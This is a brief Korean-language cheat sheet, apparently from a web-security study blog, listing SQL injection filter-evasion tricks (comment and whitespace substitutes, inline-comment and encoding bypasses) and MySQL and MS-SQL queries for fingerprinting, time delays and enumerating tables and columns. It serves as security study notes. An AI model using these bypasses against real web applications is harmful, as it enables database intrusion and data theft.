[Web] URL 필터링 취약점 및 SQL 문법 우회 정리

URL 필터 취약점

 

빈칸 우회 :  ||   +  /**/

 

주석 우회 :  --   #   %00;

 

인라인 주석 처리 : 느낌표로 시작하면 실제 SQL과 같이 동작함.  예시 :  /*!32302 and 1=0*/

 

특수문자 우회 :  URL 인코딩, 유니코드 인코딩

 

숫자 데이터 취약점 :   ASCII('A')   ASCII(1)

 

문자열 우회 :  대소문자 변경  ,  빈칸 넣기  ,   ASCII 코드 삽입(CHAR(115))  ,  

 

 

 

SQL 문법 우회

 

1. MySQL

- ASCII 함수

- SUBSTRING 함수

- Sleep 함수

- select @@version

- select database()

- select concat(table_name, ',column_name) from information_schema.columns

- select table_name from information_schema.

 

2. MS-SQL

- ASCII 함수

- SUBSTRING 함수

- waitfor delay '0:0:10'

- select @@version

- select db_name()

- select table_name+''+column_name from information_schema.columns

- select name from sysobjects where xtype='U'